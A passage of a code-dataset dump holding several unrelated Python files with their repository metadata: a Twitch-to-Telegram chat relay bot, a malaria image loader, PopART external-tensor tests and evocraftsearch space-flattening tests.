\"cotton__123\":\"주르르 🟣\"\n , \"gosegugosegu\":\"고세구 🦠\", \"viichan6\":\"비챤 🟢\", \"woowakgood\":\"우왁굳 🐵\", \"chunyangkr\":\"천양 🐡\", \"111roentgenium\":\"뢴트게늄 ☢\"}\n\nasync def run(ID):\n SERVER = \"irc.twitch.tv\"\n PORT = 6667\n IRCread: asyncio.StreamReader\n IRCwrite: asyncio.StreamWriter\n PASSWORD = connect.twAPIAutho.OAuth # This needs to be an OAuth token\n USERNAME = ID # Connect This Channel ID\n CHANNEL = USERNAME\n Connecting = True\n IRCread, IRCwrite = await asyncio.open_connection(SERVER, PORT)\n IRCwrite.write(\n (\n \"PASS \" + PASSWORD + \"\\n\" +\n \"NICK \" + USERNAME + \"\\n\" +\n \"JOIN #\" + CHANNEL + \"\\n\"\n )\n .encode()\n )\n await IRCwrite.drain()\n \n while Connecting:\n try:\n readbuffer_join = await IRCread.read(1024)\n readbuffer_join = readbuffer_join.decode()\n for line in readbuffer_join.split(\"\\n\")[0:-1]:\n if (\"End of /NAMES list\" in line):\n print(f\"{ID} Connected\")\n Connecting = False\n except:\n print(f'{ID} Connect Fail.. Retry')\n IRCread, IRCwrite = await asyncio.open_connection(SERVER, PORT)\n IRCwrite.write(\n (\n \"PASS \" + PASSWORD + \"\\n\" +\n \"NICK \" + USERNAME + \"\\n\" +\n \"JOIN #\" + CHANNEL + \"\\n\"\n )\n .encode()\n )\n await IRCwrite.drain()\n \n while True:\n readbuffer = await IRCread.read(1024)\n readbuffer = readbuffer.decode()\n for line in readbuffer.split(\"\\r\\n\"):\n if \"PRIVMSG\" in line:\n separate = line.split(\":\", 2)\n user = separate[1].split(\"!\", 1)[0]\n try:\n message = line.split(\":\", 2)[2]\n except:\n message = \"\"\n if user in isedol_id:\n if user == USERNAME:\n bot.sendMessage(chat_id=TG.chat_id, text= isedol_kr[user] + \":\\n\" + message)\n else:\n bot.sendMessage(chat_id=TG.chat_id, text= isedol_kr[user] + \" → \" + isedol_kr[USERNAME] + \":\\n\" + message)\n elif \"PING\" in line:\n print(f\"Received a PING : {ID}\")\n message = \"PONG tmi.twitch.tv\\r\\n\".encode()\n IRCwrite.write(message)\n await IRCwrite.drain()\n print(\"Sent a PONG\")\n\n# Define execute function\nasync def main():\n print(\"Ready on Notification\")\n await asyncio.gather(run(track[0]), run(track[1]), run(track[2]), run(track[3]), run(track[4])\n , run(track[5]), run(track[6]), run(track[7]), run(track[8]))\n\n# Start\nif __name__ == '__main__':\n asyncio.run(main())", "repo_name": "BakedNut/isedol_twitch_alert_bot", "sub_path": "chat_alert.py", "file_name": "chat_alert.py", "file_ext": "py", "file_size_in_byte": 3432, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "52", "api": [{"api_name": "connect.ConnectTG", "line_number": 8, "usage_type": "call"}, {"api_name": "asyncio.StreamReader", "line_number": 20, "usage_type": "attribute"}, {"api_name": "asyncio.StreamWriter", "line_number": 21, "usage_type": "attribute"}, {"api_name": "connect.twAPIAutho", "line_number": 22, "usage_type": "attribute"}, {"api_name": "asyncio.open_connection", "line_number": 26, "usage_type": "call"}, {"api_name": "asyncio.open_connection", "line_number": 47, "usage_type": "call"}, {"api_name": "asyncio.gather", "line_number": 84, "usage_type": "call"}, {"api_name": "asyncio.run", "line_number": 89, "usage_type": "call"}]} +{"seq_id": "37479163348", "text": "import os\n\nimport cv2\nfrom keras_preprocessing.image import img_to_array, load_img\n\n\ndef convert_dataset(directory_path):\n data = []\n labels = []\n # loop over the input images\n for image_dir in os.listdir(directory_path):\n potential_dir = os.path.join(directory_path, image_dir)\n if not os.path.isdir(potential_dir):\n continue\n for image_name in os.listdir(potential_dir)[:1000]:\n image_path = os.path.join(directory_path, image_dir, image_name)\n # load the image, pre-process it, and store it in the data list\n try:\n image = cv2.imread(image_path)\n image = img_to_array(image)\n data.append(image)\n # extract the class label from the image path and update the\n # labels list\n label = 1 if image_dir == \"Parasitized\" else 0\n labels.append(label)\n except:\n continue\n return data, labels\n", "repo_name": "Ori-Roza/malaria-cells-classification", "sub_path": "handle_data.py", "file_name": "handle_data.py", "file_ext": "py", "file_size_in_byte": 996, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.listdir", "line_number": 11, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path", "line_number": 12, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path", "line_number": 13, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 15, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path", "line_number": 16, "usage_type": "attribute"}, {"api_name": "cv2.imread", "line_number": 19, "usage_type": "call"}, {"api_name": "keras_preprocessing.image.img_to_array", "line_number": 20, "usage_type": "call"}]} +{"seq_id": "2520539272", "text": "import numpy as np\nimport os\nimport popart\nimport pytest\nimport tempfile\n\n\ndef test_save_tensors_externally():\n d1 = np.array([1, -1, 6]).astype(np.float32)\n d2 = np.array([7, 4]).astype(np.float16)\n builder = popart.Builder()\n i1 = builder.addInitializedInputTensor(d1)\n i2 = builder.addInitializedInputTensor(d2)\n o = builder.aiOnnx.add([i1, i2])\n tmpdir = tempfile.mkdtemp()\n\n def checkFile(file):\n # Check file exists\n assert os.path.exists(file)\n\n # Check file is of expected size: (3 * 4) + (2 * 2) = 16 bytes\n assert os.path.getsize(file) == 16\n\n # Read the binary data back in and check the value is as expected\n assert np.array_equal(np.fromfile(file, dtype=np.float32, count=3), d1)\n assert np.array_equal(\n np.fromfile(file, dtype=np.float16, count=2, offset=12), d2)\n\n # Test GraphTransformer\n tmpfile0 = os.path.join(tmpdir, \"model_tensors0.onnx\")\n graph_transformer = popart.GraphTransformer(builder.getModelProto())\n graph_transformer.saveInitializersExternally([i1, i2], tmpfile0)\n checkFile(tmpfile0)\n\n # Test Builder\n tmpfile1 = os.path.join(tmpdir, \"model_tensors1.onnx\")\n builder.saveInitializersExternally([i1, i2], tmpfile1)\n checkFile(tmpfile1)\n\n\ndef test_try_save_externally_when_already_external():\n builder = popart.Builder()\n i1 = builder.addInitializedInputTensor(np.ones([10], dtype=np.float32))\n tmpdir = tempfile.mkdtemp()\n tmpfile = os.path.join(tmpdir, \"model_tensors.onnx\")\n builder.saveInitializersExternally([i1], tmpfile)\n\n with pytest.raises(popart.popart_exception) as e_info:\n builder.saveInitializersExternally([i1], tmpfile)\n assert \"already has an external data_location\" in e_info.value.args[0]\n\n\ndef test_try_save_non_initializer_externally():\n builder = popart.Builder()\n c = builder.aiOnnx.constant(np.array([1, 6], dtype=np.float32))\n tmpdir = tempfile.mkdtemp()\n tmpfile = os.path.join(tmpdir, \"model_tensors.onnx\")\n\n with pytest.raises(popart.popart_exception) as e_info:\n builder.saveInitializersExternally([c], tmpfile)\n assert \"is not an initializer\" in e_info.value.args[0]\n\n\ndef test_load_externally_saved_tensors():\n \"\"\"\n Test that initializer data can be saved in a separate file, and read into\n the PopART IR in an InferenceSession (by observing an expected inference\n result)\n \"\"\"\n builder = popart.Builder()\n d1 = np.array([1, -1, 6]).astype(np.float32)\n d2 = np.array([-8, 7, 4]).astype(np.float32)\n i1 = builder.addInitializedInputTensor(d1)\n i2 = builder.addInitializedInputTensor(d2)\n o = builder.aiOnnx.add([i1, i2])\n tmpdir = tempfile.mkdtemp()\n tmpfile_tensors = os.path.join(tmpdir, \"tensors.onnx\")\n tmpfile_model = os.path.join(tmpdir, \"model.onnx\")\n builder.saveInitializersExternally([i1, i2], tmpfile_tensors)\n builder.saveModelProto(tmpfile_model)\n\n # Create builder from onnx model\n builder = popart.Builder(tmpfile_model)\n dataFlow = popart.DataFlow(1, {o: popart.AnchorReturnType(\"All\")})\n session = popart.InferenceSession(\n fnModel=builder.getModelProto(),\n dataFlow=dataFlow,\n deviceInfo=popart.DeviceManager().createCpuDevice())\n anchors = session.initAnchorArrays()\n session.prepareDevice()\n stepio = popart.PyStepIO({}, anchors)\n session.run(stepio)\n assert (np.array_equal(anchors[o], d1 + d2))\n\n\ndef test_save_back_externally_saved_tensors():\n \"\"\"\n Test that initializers (stored externally in the onnx model) that are\n updated in a training session are written back correctly when the onnx\n model is written using the Session API\n Model:\n in0 -\n \\\n Matmul0 - Matmul1 - out\n / /\n w0 -- w1--\n \"\"\"\n builder = popart.Builder()\n shape = [4, 4]\n elms = np.prod(shape)\n numLayers = 2\n in0 = builder.addInputTensor(popart.TensorInfo(\"FLOAT\", shape))\n initWeights = []\n weightsIds = []\n anchorsDef = {}\n out = in0\n for layer in range(numLayers):\n w_init = np.random.rand(*shape).astype('float32')\n initWeights.append(w_init)\n weightsIds.append(builder.addInitializedInputTensor(w_init))\n anchorsDef[weightsIds[layer]] = popart.AnchorReturnType(\"All\")\n out = builder.aiOnnx.matmul([out, weightsIds[layer]])\n\n loss = builder.aiGraphcore.identityloss([out])\n tmpdir = tempfile.mkdtemp()\n tmpfile_weights = os.path.join(tmpdir, \"weights.onnx\")\n builder.saveInitializersExternally(weightsIds, tmpfile_weights)\n\n # Verify the initial weights are saved correctly\n for layer in range(numLayers):\n saved_weights = np.fromfile(tmpfile_weights,\n dtype=np.float32,\n count=elms,\n offset=layer * elms * 4)\n assert (np.array_equal(initWeights[layer].flatten(), saved_weights))\n\n opts = popart.SessionOptions()\n session = popart.TrainingSession(\n fnModel=builder.getModelProto(),\n dataFlow=popart.DataFlow(1, anchorsDef),\n deviceInfo=popart.DeviceManager().createCpuDevice(),\n optimizer=popart.ConstSGD(10),\n loss=loss)\n\n anchors = session.initAnchorArrays()\n inputs = {in0: np.random.rand(*shape).astype('float32')}\n stepio = popart.PyStepIO(inputs, anchors)\n\n session.prepareDevice()\n session.weightsFromHost()\n\n session.run(stepio)\n\n # Check the weights have been updated\n for layer in range(numLayers):\n assert not np.allclose(anchors[weightsIds[layer]], initWeights[layer])\n\n # Save the model with updated weights back to disk\n tmpfile_model = os.path.join(tmpdir, \"model.onnx\")\n session.modelToHost(tmpfile_model)\n\n # Verify that the file containing tensor data has also been updated\n for layer in range(numLayers):\n saved_weights = np.fromfile(tmpfile_weights,\n dtype=np.float32,\n count=elms,\n offset=layer * elms * 4)\n assert np.array_equal(anchors[weightsIds[layer]].flatten(),\n saved_weights)\n", "repo_name": "shyamalschandra/popart", "sub_path": "tests/popart/external_tensorproto_data_test.py", "file_name": "external_tensorproto_data_test.py", "file_ext": "py", "file_size_in_byte": 6227, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "numpy.array", "line_number": 9, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 9, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 10, "usage_type": "call"}, {"api_name": "numpy.float16", "line_number": 10, "usage_type": "attribute"}, {"api_name": "popart.Builder", "line_number": 11, "usage_type": "call"}, {"api_name": "tempfile.mkdtemp", "line_number": 15, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 19, "usage_type": "call"}, {"api_name": "os.path", "line_number": 19, "usage_type": "attribute"}, {"api_name": "os.path.getsize", "line_number": 22, "usage_type": "call"}, {"api_name": "os.path", "line_number": 22, "usage_type": "attribute"}, {"api_name": "numpy.array_equal", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.fromfile", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 25, "usage_type": "attribute"}, {"api_name": "numpy.array_equal", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.fromfile", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.float16", "line_number": 27, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path", "line_number": 30, "usage_type": "attribute"}, {"api_name": "popart.GraphTransformer", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 36, "usage_type": "call"}, {"api_name": "os.path", "line_number": 36, "usage_type": "attribute"}, {"api_name": "popart.Builder", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 43, "usage_type": "attribute"}, {"api_name": "tempfile.mkdtemp", "line_number": 44, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 45, "usage_type": "call"}, {"api_name": "os.path", "line_number": 45, "usage_type": "attribute"}, {"api_name": "pytest.raises", "line_number": 48, "usage_type": "call"}, {"api_name": "popart.popart_exception", "line_number": 48, "usage_type": "attribute"}, {"api_name": "popart.Builder", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 55, "usage_type": "attribute"}, {"api_name": "tempfile.mkdtemp", "line_number": 56, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 57, "usage_type": "call"}, {"api_name": "os.path", "line_number": 57, "usage_type": "attribute"}, {"api_name": "pytest.raises", "line_number": 59, "usage_type": "call"}, {"api_name": "popart.popart_exception", "line_number": 59, "usage_type": "attribute"}, {"api_name": "popart.Builder", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 71, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 71, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 72, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 72, "usage_type": "attribute"}, {"api_name": "tempfile.mkdtemp", "line_number": 76, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 77, "usage_type": "call"}, {"api_name": "os.path", "line_number": 77, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 78, "usage_type": "call"}, {"api_name": "os.path", "line_number": 78, "usage_type": "attribute"}, {"api_name": "popart.Builder", "line_number": 83, "usage_type": "call"}, {"api_name": "popart.DataFlow", "line_number": 84, "usage_type": "call"}, {"api_name": "popart.AnchorReturnType", "line_number": 84, "usage_type": "call"}, {"api_name": "popart.InferenceSession", "line_number": 85, "usage_type": "call"}, {"api_name": "popart.DeviceManager", "line_number": 88, "usage_type": "call"}, {"api_name": "popart.PyStepIO", "line_number": 91, "usage_type": "call"}, {"api_name": "numpy.array_equal", "line_number": 93, "usage_type": "call"}, {"api_name": "popart.Builder", "line_number": 108, "usage_type": "call"}, {"api_name": "numpy.prod", "line_number": 110, "usage_type": "call"}, {"api_name": "popart.TensorInfo", "line_number": 112, "usage_type": "call"}, {"api_name": "numpy.random.rand", "line_number": 118, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 118, "usage_type": "attribute"}, {"api_name": "popart.AnchorReturnType", "line_number": 121, "usage_type": "call"}, {"api_name": "tempfile.mkdtemp", "line_number": 125, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 126, "usage_type": "call"}, {"api_name": "os.path", "line_number": 126, "usage_type": "attribute"}, {"api_name": "numpy.fromfile", "line_number": 131, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 132, "usage_type": "attribute"}, {"api_name": "numpy.array_equal", "line_number": 135, "usage_type": "call"}, {"api_name": "popart.SessionOptions", "line_number": 137, "usage_type": "call"}, {"api_name": "popart.TrainingSession", "line_number": 138, "usage_type": "call"}, {"api_name": "popart.DataFlow", "line_number": 140, "usage_type": "call"}, {"api_name": "popart.DeviceManager", "line_number": 141, "usage_type": "call"}, {"api_name": "popart.ConstSGD", "line_number": 142, "usage_type": "call"}, {"api_name": "numpy.random.rand", "line_number": 146, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 146, "usage_type": "attribute"}, {"api_name": "popart.PyStepIO", "line_number": 147, "usage_type": "call"}, {"api_name": "numpy.allclose", "line_number": 156, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 159, "usage_type": "call"}, {"api_name": "os.path", "line_number": 159, "usage_type": "attribute"}, {"api_name": "numpy.fromfile", "line_number": 164, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 165, "usage_type": "attribute"}, {"api_name": "numpy.array_equal", "line_number": 168, "usage_type": "call"}]} +{"seq_id": "15043675557", "text": "from unittest import TestCase\n\nimport torch\nfrom addict import Dict\nfrom evocraftsearch.spaces import TupleSpace, BoxSpace, DiscreteSpace, MultiDiscreteSpace, MultiBinarySpace, DictSpace\nfrom evocraftsearch.spaces import utils\n\n\nclass TestSpace(TestCase):\n def test_flatdim(self):\n space_flatdim_tuples = [\n (DiscreteSpace(3), 3),\n (BoxSpace(low=0., high=float('inf'), shape=(2, 2)), 4),\n (TupleSpace([DiscreteSpace(5), DiscreteSpace(10)]), 15),\n (TupleSpace(\n [DiscreteSpace(5), BoxSpace(low=torch.tensor([0, 0]), high=torch.tensor([1, 5]), dtype=torch.float32)]),\n 7),\n (TupleSpace((DiscreteSpace(5), DiscreteSpace(2), DiscreteSpace(2))), 9),\n (MultiDiscreteSpace([2, 2, 100]), 3),\n (MultiBinarySpace(10), 10),\n (DictSpace({\"position\": DiscreteSpace(5),\n \"velocity\": BoxSpace(low=torch.tensor([0, 0]), high=torch.tensor([1, 5]),\n dtype=torch.float32)}), 7),\n ]\n for space, flatdim in space_flatdim_tuples:\n dim = utils.flatdim(space)\n assert dim == flatdim, \"Expected {} to equal {}\".format(dim, flatdim)\n\n def test_flatten_space_boxes(self):\n spaces = [\n DiscreteSpace(3),\n BoxSpace(low=0., high=float('inf'), shape=(2, 2)),\n TupleSpace([DiscreteSpace(5), DiscreteSpace(10)]),\n TupleSpace(\n [DiscreteSpace(5), BoxSpace(low=torch.tensor([0, 0]), high=torch.tensor([1, 5]), dtype=torch.float32)]),\n TupleSpace((DiscreteSpace(5), DiscreteSpace(2), DiscreteSpace(2))),\n MultiDiscreteSpace([2, 2, 100]),\n MultiBinarySpace(10),\n DictSpace({\"position\": DiscreteSpace(5),\n \"velocity\": BoxSpace(low=torch.tensor([0, 0]), high=torch.tensor([1, 5]), dtype=torch.float32)}),\n ]\n\n for space in spaces:\n flat_space = utils.flatten_space(space)\n assert isinstance(flat_space, BoxSpace), \"Expected {} to equal {}\".format(type(flat_space), BoxSpace)\n flatdim = utils.flatdim(space)\n (single_dim,) = flat_space.shape\n assert single_dim == flatdim, \"Expected {} to equal {}\".format(single_dim, flatdim)\n\n def test_flat_space_contains_flat_points(self):\n spaces = [\n DiscreteSpace(3),\n BoxSpace(low=0., high=float('inf'), shape=(2, 2)),\n TupleSpace([DiscreteSpace(5), DiscreteSpace(10)]),\n TupleSpace(\n [DiscreteSpace(5), BoxSpace(low=torch.tensor([0, 0]), high=torch.tensor([1, 5]), dtype=torch.float32)]),\n TupleSpace((DiscreteSpace(5), DiscreteSpace(2), DiscreteSpace(2))),\n MultiDiscreteSpace([2, 2, 100]),\n MultiBinarySpace(10),\n DictSpace({\"position\": DiscreteSpace(5),\n \"velocity\": BoxSpace(low=torch.tensor([0, 0]), high=torch.tensor([1, 5]), dtype=torch.float32)}),\n ]\n for space in spaces:\n some_samples = [space.sample() for _ in range(10)]\n flattened_samples = [utils.flatten(space, sample) for sample in some_samples]\n flat_space = utils.flatten_space(space)\n for i, flat_sample in enumerate(flattened_samples):\n assert flat_sample in flat_space, 'Expected sample #{} {} to be in {}'.format(i, flat_sample,\n flat_space)\n\n def test_flatten_dim(self):\n spaces = [\n DiscreteSpace(3),\n BoxSpace(low=0., high=float('inf'), shape=(2, 2)),\n TupleSpace([DiscreteSpace(5), DiscreteSpace(10)]),\n TupleSpace(\n [DiscreteSpace(5), BoxSpace(low=torch.tensor([0, 0]), high=torch.tensor([1, 5]), dtype=torch.float32)]),\n TupleSpace((DiscreteSpace(5), DiscreteSpace(2), DiscreteSpace(2))),\n MultiDiscreteSpace([2, 2, 100]),\n MultiBinarySpace(10),\n DictSpace({\"position\": DiscreteSpace(5),\n \"velocity\": BoxSpace(low=torch.tensor([0, 0]), high=torch.tensor([1, 5]), dtype=torch.float32)}),\n ]\n for space in spaces:\n sample = utils.flatten(space, space.sample())\n (single_dim,) = sample.shape\n flatdim = utils.flatdim(space)\n assert single_dim == flatdim, \"Expected {} to equal {}\".format(single_dim, flatdim)\n\n def test_flatten_roundtripping(self):\n spaces = [\n DiscreteSpace(3),\n BoxSpace(low=0., high=float('inf'), shape=(2, 2)),\n TupleSpace([DiscreteSpace(5), DiscreteSpace(10)]),\n TupleSpace(\n [DiscreteSpace(5), BoxSpace(low=torch.tensor([0, 0]), high=torch.tensor([1, 5]), dtype=torch.float32)]),\n TupleSpace((DiscreteSpace(5), DiscreteSpace(2), DiscreteSpace(2))),\n MultiDiscreteSpace([2, 2, 100]),\n MultiBinarySpace(10),\n DictSpace({\"position\": DiscreteSpace(5),\n \"velocity\": BoxSpace(low=torch.tensor([0, 0]), high=torch.tensor([1, 5]), dtype=torch.float32)}),\n ]\n for space in spaces:\n some_samples = [space.sample() for _ in range(10)]\n flattened_samples = [utils.flatten(space, sample) for sample in some_samples]\n roundtripped_samples = [utils.unflatten(space, sample) for sample in flattened_samples]\n for i, (original, roundtripped) in enumerate(zip(some_samples, roundtripped_samples)):\n assert compare_nested(original, roundtripped), \\\n 'Expected sample #{} {} to equal {}'.format(i, original, roundtripped)\n\n\ndef compare_nested(left, right):\n if isinstance(left, torch.Tensor) and isinstance(right, torch.Tensor):\n return torch.allclose(left, right)\n\n elif isinstance(left, Dict) and isinstance(right, Dict):\n res = len(left) == len(right)\n for ((left_key, left_value), (right_key, right_value)) in zip(left.items(), right.items()):\n if not res:\n return False\n res = left_key == right_key and compare_nested(left_value, right_value)\n return res\n elif isinstance(left, (tuple, list)) and isinstance(right, (tuple, list)):\n res = len(left) == len(right)\n for (x, y) in zip(left, right):\n if not res:\n return False\n res = compare_nested(x, y)\n return res\n else:\n return left == right\n", "repo_name": "mayalenE/evocraftsearch", "sub_path": "spaces/tests/test_utils.py", "file_name": "test_utils.py", "file_ext": "py", "file_size_in_byte": 6571, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "52", "api": [{"api_name": "unittest.TestCase", "line_number": 9, "usage_type": "name"}, {"api_name": "evocraftsearch.spaces.DiscreteSpace", "line_number": 12, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.BoxSpace", "line_number": 13, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.TupleSpace", "line_number": 14, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.DiscreteSpace", "line_number": 14, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.TupleSpace", "line_number": 15, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.DiscreteSpace", "line_number": 16, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.BoxSpace", "line_number": 16, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 16, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 16, "usage_type": "attribute"}, {"api_name": "evocraftsearch.spaces.TupleSpace", "line_number": 18, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.DiscreteSpace", "line_number": 18, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.MultiDiscreteSpace", "line_number": 19, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.MultiBinarySpace", "line_number": 20, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.DictSpace", "line_number": 21, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.DiscreteSpace", "line_number": 21, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.BoxSpace", "line_number": 22, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 22, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 23, "usage_type": "attribute"}, {"api_name": "evocraftsearch.spaces.utils.flatdim", "line_number": 26, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.utils", "line_number": 26, "usage_type": "name"}, {"api_name": "evocraftsearch.spaces.DiscreteSpace", "line_number": 31, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.BoxSpace", "line_number": 32, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.TupleSpace", "line_number": 33, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.DiscreteSpace", "line_number": 33, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.TupleSpace", "line_number": 34, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.DiscreteSpace", "line_number": 35, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.BoxSpace", "line_number": 35, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 35, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 35, "usage_type": "attribute"}, {"api_name": "evocraftsearch.spaces.TupleSpace", "line_number": 36, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.DiscreteSpace", "line_number": 36, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.MultiDiscreteSpace", "line_number": 37, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.MultiBinarySpace", "line_number": 38, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.DictSpace", "line_number": 39, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.DiscreteSpace", "line_number": 39, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.BoxSpace", "line_number": 40, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 40, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 40, "usage_type": "attribute"}, {"api_name": "evocraftsearch.spaces.utils.flatten_space", "line_number": 44, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.utils", "line_number": 44, "usage_type": "name"}, {"api_name": "evocraftsearch.spaces.BoxSpace", "line_number": 45, "usage_type": "argument"}, {"api_name": "evocraftsearch.spaces.utils.flatdim", "line_number": 46, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.utils", "line_number": 46, "usage_type": "name"}, {"api_name": "evocraftsearch.spaces.DiscreteSpace", "line_number": 52, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.BoxSpace", "line_number": 53, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.TupleSpace", "line_number": 54, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.DiscreteSpace", "line_number": 54, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.TupleSpace", "line_number": 55, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.DiscreteSpace", "line_number": 56, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.BoxSpace", "line_number": 56, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 56, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 56, "usage_type": "attribute"}, {"api_name": "evocraftsearch.spaces.TupleSpace", "line_number": 57, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.DiscreteSpace", "line_number": 57, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.MultiDiscreteSpace", "line_number": 58, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.MultiBinarySpace", "line_number": 59, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.DictSpace", "line_number": 60, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.DiscreteSpace", "line_number": 60, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.BoxSpace", "line_number": 61, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 61, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 61, "usage_type": "attribute"}, {"api_name": "evocraftsearch.spaces.utils.flatten", "line_number": 65, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.utils", "line_number": 65, "usage_type": "name"}, {"api_name": "evocraftsearch.spaces.utils.flatten_space", "line_number": 66, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.utils", "line_number": 66, "usage_type": "name"}, {"api_name": "evocraftsearch.spaces.DiscreteSpace", "line_number": 73, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.BoxSpace", "line_number": 74, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.TupleSpace", "line_number": 75, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.DiscreteSpace", "line_number": 75, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.TupleSpace", "line_number": 76, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.DiscreteSpace", "line_number": 77, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.BoxSpace", "line_number": 77, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 77, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 77, "usage_type": "attribute"}, {"api_name": "evocraftsearch.spaces.TupleSpace", "line_number": 78, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.DiscreteSpace", "line_number": 78, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.MultiDiscreteSpace", "line_number": 79, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.MultiBinarySpace", "line_number": 80, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.DictSpace", "line_number": 81, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.DiscreteSpace", "line_number": 81, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.BoxSpace", "line_number": 82, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 82, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 82, "usage_type": "attribute"}, {"api_name": "evocraftsearch.spaces.utils.flatten", "line_number": 85, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.utils", "line_number": 85, "usage_type": "name"}, {"api_name": "evocraftsearch.spaces.utils.flatdim", "line_number": 87, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.utils", "line_number": 87, "usage_type": "name"}, {"api_name": "evocraftsearch.spaces.DiscreteSpace", "line_number": 92, "usage_type": "call"}, {"api_name": 